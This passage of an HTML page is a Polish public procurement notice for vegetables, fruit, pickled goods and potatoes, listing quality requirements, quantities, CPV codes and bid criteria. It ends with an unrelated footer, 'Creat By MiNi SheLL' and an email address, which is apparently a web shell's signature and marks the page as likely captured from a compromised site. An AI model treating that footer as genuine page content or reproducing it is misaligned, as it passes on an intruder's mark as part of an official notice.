	bez uszkodzeń mechanicznych i stłuczeń,
	twardy, jędrny,
	bez oznak zmarznięcia,
	bez szkodników i śladów po szkodnikach,
	o świeżym wyglądzie,
	na przekroju: biały lub biało-kremowy,
	bez pustych przestrzeni,
	bez oznak wyrastania pędów kwiatostanowych,
	bez obcych zapachów i posmaków,
	seler niedopuszczalny: niecały, objawami zepsucia, 
	twarda, jędrna, bez śladów okrawania,
4.  Pietruszka KLASA I - ilość 6 000 kg
	zdrowa bez śladów gnicia,
	cała, korzeń prawidłowo wykształcony, gładki,
	bez ordzawień skórki,
	czysta, myta, wysuszona,
	bez uszkodzeń mechanicznych i stłuczeń,
	twarda, jędrna,
	bez oznak zmarznięcia,
	bez szkodników i śladów po szkodnikach,
	o świeżym wyglądzie,
	na przekroju: biała lub biało-kremowa,
	bez pustych przestrzeni,
	korzeń bez rozwidleń i bocznych rozgałęzień,
	bez oznak wyrastania pędów kwiatostanowych,
	bez obcych zapachów i posmaków,
	w klasie I średnica korzenia mierzona w najszerszym przekroju od 2 do 4 cm,
	pietruszka niedopuszczalna: niecała, z objawami zepsucia,
	twarda, jędrna, bez śladów okrawania,

5.  Cebula  KLASA I - ilość 9 000 kg
	cała, bez żadnych uszkodzeń,
	zdrowa, bez objawów gnicia lub takiego zepsucia, które czynią ją niezdatną do spożycia,
	czysta, wolna od jakichkolwiek zanieczyszczeń obcych,
	wolna od szkodników lub uszkodzeń spowodowanych przez szkodniki,
	wystarczająco sucha, pokryta suchą łuską, która może być lekko zielona,
	wystarczająco rozwinięta, jędrna i zwarta oraz wolna od obcych zapachów i smaków,
	o średnicy: 35mm, max 50mm,
6.  Kapusta biała świeża KLASA I - ilość 6 500 kg
	w stanie nienaruszonym,
	o świeżym wyglądzie,
	nie popękana, bez oznak wyrastania kwiatostanu,
	zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
	bez zgnieceń i uszkodzeń,	wolna od owadów lub innych pasożytów,
	pozbawiona uszkodzeń spowodowanych mrozem,
	czysta, tzn: wolna od jakichkolwiek substancji obcych,
	pozbawiona nadmiernego zawilgocenia zewnętrznego,
	wolna od wszelkich obcych zapachów i smaków,
	łodyga powinna być ucięta tuż poniżej najniższego punktu, z którego wyrasta liść; liście powinny ściśle przylegać do siebie, a miejsce cięcia powinno być czyste,
	wielkość kapusty głowiastej określa się według wagi netto. Nie może on wynosić mniej niż 350 gramów dla jednej główki,
	każde opakowanie lub partia, w przypadku przewożenia luzem, musi zawierać kapustę tego samego pochodzenia, odmiany i jakości,
	główki kapusty muszą być jednolite pod względem kształtu i barwy,
	opakowanie musi zapewniać właściwą ochronę kapusty(może być dostarczana w workach)
7.  Kapusta czerwona świeża KLASA I - ilość  5 000 kg
	w stanie nienaruszonym,
	o świeżym wyglądzie,
	nie popękana, bez oznak wyrastania kwiatostanu,
	zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
	bez zgnieceń i uszkodzeń,
	wolna od owadów lub innych pasożytów,
	pozbawiona uszkodzeń spowodowanych mrozem,
	czysta, tzn: wolna od jakichkolwiek substancji obcych,
	pozbawiona nadmiernego zawilgocenia zewnętrznego,
	wolna od wszelkich obcych zapachów i smaków,
	łodyga powinna być ucięta tuż poniżej najniższego punktu, z którego wyrasta liść; liście powinny ściśle przylegać do siebie, a miejsce cięcia powinno być czyste,
	wielkość kapusty głowiastej określa się według wagi netto. Nie może on wynosić mniej niż 350 gramów dla jednej główki,
	każde opakowanie lub partia, w przypadku przewożenia luzem, musi zawierać kapustę tego samego pochodzenia, odmiany i jakości,
	główki kapusty muszą być jednolite pod względem kształtu i barwy,
	opakowanie musi zapewniać właściwą ochronę kapusty(może być dostarczana w workach).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II owoce:
1.  Grejpfrut - ilość 400 kg
	całe,
	wolne od odgnieceń lub nadmiernych zabliźnionych skaleczeń,
	zdrowe; nie dopuszcza się owoców z objawami gnicia lub zepsucia, króre czynią je niezdatnymi do spożycia,
	czyste tzn; wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	wolne od oznak wewnętrznego wysychania,
	wolne od uszkodzeń spowodowanych niskimi temperaturami lub mrozem,
	wolne od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	dobrej jakości,
	mieć cechy charakterystyczne dla danej odmiany lub typu handlowego,
	dopuszcza się niewielkie wady kształtu i barwy oraz niewielki wady skórki powstające podczas kształtowania owocu jak osrebrzenie, ordzawienie itp., jak również niewielkie, zabliźnione uszkodzenia mechaniczne jak uszkodzenia gradowe, otarcia, uszkodzenia w czasie manipulacji itp., pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd owoców oraz ich jakość,

2.    Jabłka - 1 500 kg
	całe, 
	zdrowe; nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia,
	czyste tzn; wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	wolne od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	niedopuszczalne są owoce; nie w pełni rozwinięte lub niedojrzałe, które więdną w czasie składowania oraz są kwaśne i twarde, co dyskwalifikuje je pod względem przydatności do spożycia, przejrzałe, które po wystawieniu z chłodni wykazują wady takie jak wewnętrzne obrązowienie, oparzelinę przechowalniczą czy wady spowodowane zbyt niską temperaturą,
	mieć kształt, wielkość i barwę charakterystyczne dla danej odmiany,
	dopuszcza się występowanie pewnych wad, jak: niewielkie wady rozwoju, niewielkie wady barwy, niewielkie wady skórki, lekkie odgniecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KISZONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III kiszonki:

1.  Kapusta kiszona - ilość  8 000 kg

	produkt spożywczy otrzymany z kapusty głowiastej białej, 
	oczyszczonej z liści zewnętrznych, 
	pokrojonej, 
	zasolonej i poddanej naturalnemu procesowi fermentacji  mlekowej, 
	opakowanie - beczki
	min. okres przydatności 3 m-ce od dnia dostawy
2.  Ogórki kiszone - ilość 4 000 kg
	produkt spożywczy otrzymany z ogórków, przypraw, aromatyczno-smakowych, zalanych zalewą z dodatkiem soli i poddanych naturalnemu procesowi fermentacji mlekowej,
	z ewentualnym dodatkiem kwasu sorbowego, 
	struktura- dość luźno ułożone całe ogórki,
	jędrne, 
	chrupkie, 
	opakowanie- beczki  
	min. okres przydatności 3 m-ce od dnia dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA ŚWIERZE (pieczarki, ogórki, pomidory).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV pieczarki, ogórki i pomidory świeże:

1.  Pieczarka świeża - 100 kg
	całe, 
	zdrowe; nie dopuszcza się pieczarek z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia,
	czyste tzn; wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	bez obcych zapachów lub smaków,

2.  Ogórek świeży -  400 kg
	cały tzn;, bez żadnych ubytków i uszkodzeń,
	zdrowe, bez objawów gnicia lub takiego zepsucia, które czynią je niezdatne do spożycia,
	o świeżym wyglądzie,
	wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników lub uszkodzeń spowodowanych przez szkodniki
	wolne od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	bez gorzkiego smaku,
	ogórki powinny być: właściwie wykształcone, o dostatecznie typowym kształcie i praktycznie proste,
	dopuszcza się następujące wady: lekkie zniekształcenie, z wyjątkiem zniekształceń spowodowanych przerośnięciem nasion, niewielkie wady barwy, szczególnie jasne zabarwienie w części ogórka stykającej się z ziemią podczas wzrostu, lekkie uszkodzenia skórki spowodowane otarciem, manipulacją lub niską temperaturą, pod warunkiem że są zbliżone i nie wpływają ujemnie na trwałość produktu,

3.  Pomidor świeży -  500 kg
	cały tzn;, bez żadnych ubytków i uszkodzeń,
	zdrowy, bez objawów gnicia lub takiego zepsucia, które czynią je niezdatne do spożycia,
	o świeżym wyglądzie,
	wolny od jakichkolwiek zanieczyszczeń obcych,
	wolny od szkodników lub uszkodzeń spowodowanych przez szkodniki
	wolny od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	pomidory powinny być dobrej jakości, wystarczająco jędrne i mieć cechy charakterystyczne dla danej odmiany (nie dopuszcza się pęknięć i widocznych zielonych piętek),
	dopuszcza się lekkie wady kształtu, rozwoju, barwy lub bardzo lekkie odgniecenia oraz deformacje, pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd pomidorów, ich trwałość i wygląd w opakowaniu,
	o średnicy 50mm i powyżej, lecz poniżej 70mm,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V Ziemniaki:

1.  Ziemniaki jadalne późne  - ilość  135 000 kg

	całe bez ran powstałych podczas zbioru lub pakowania,
	jędrne, bez objawów zwiędnięcia,
	zdrowe, bez objawów zapatrzeń, zmarznięcia i gnicia,
	bez szkodników i śladów po szkodnikach,
	czyste, bez obcych zanieczyszczeń, bez grudek ziemi,
	prawidłowo wykształcone,
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	bez śladów kwitnięcia,
	oczyszczone,
	jednolite odmianowo (kształt typowy dla danej odmiany, miąższ średnio zwięzły, nie         rozsypującym się, bulwy duże okrągło owalne, oczka płytkie, skórka gładka), 
	bez pustych miejsc w środku ziemniaka,
	średnica: poprzeczna od 4 do 5 cm, podłużna od 6 do 7 cm,
	dopuszczalne tolerancje dla ziemniaka: kłębów nie odpowiadających wymaganiom            jakościowym - 5%,
	ziemniak niedopuszczalny: nie doczyszczony, ze śladami po gryzoniach, z objawami        zepsucia,
	pakowane w worki 25-30 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com